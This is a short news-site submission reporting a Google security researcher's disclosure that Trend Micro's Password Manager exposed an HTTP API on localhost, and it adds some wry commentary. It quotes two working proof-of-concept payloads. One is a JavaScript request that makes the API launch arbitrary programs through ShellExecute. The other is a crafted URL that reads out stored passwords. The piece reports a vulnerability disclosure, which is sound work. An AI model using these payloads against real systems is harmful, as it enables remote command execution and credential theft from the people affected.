Trend Micro AV has HTTP listener which can run arbitrary OS commands from the Internet

Accepted submission by el_oscuro at 2016-01-26 03:01:22
Security

According to google-security-research, "When you install TrendMicro Antivirus on Windows, by default a component called Password Manager is also installed and automatically launched on startup.

http://www.trendmicro.com/us/home/products/software/password-manager/index.html

This product is primarily written in JavaScript with node.js, and opens multiple HTTP RPC ports for handling API requests.

It took about 30 seconds to spot one that permits arbitrary command execution, openUrlInDefaultBrowser, which eventually maps to ShellExecute().

This means any website can launch arbitrary commands, like this:

// Cross-origin GET from any web page: the response is not readable, but the
// side effect (ShellExecute on the url parameter) fires anyway.
var x = new XMLHttpRequest();
x.open("GET", "https://localhost:49155/api/openUrlInDefaultBrowser?url=c:/windows/system32/calc.exe", true);
try { x.send(); } catch (e) {}

TrendMicro helpfully adds a self-signed https certificate for localhost to the trust store, so you don't need to click through any pesky security errors."

It is not like they would ever be useful, now would they?

We always make jokes about posting our passwords on our homepage, but apparently with TrendMicro, that is a feature:

"I noticed that there is a nice clean API for accessing passwords stored in the password manager, so anyone can just read all of the stored passwords:

https://localhost:49155/api/showSB?url=javascript:topWindow.process.mainModule.exports.Tower.handle.getUserData(function(n){alert(JSON.stringify(JSON.parse(n).data.passcard[0]))})

Users are prompted on installation to export their browser passwords, but that's optional. I think an attacker can force it with /exportBrowserPasswords API, so even that doesn't help. I sent an email pointing this out:"

I could go on, but go ahead and RTFA. You can't make this stuff up.
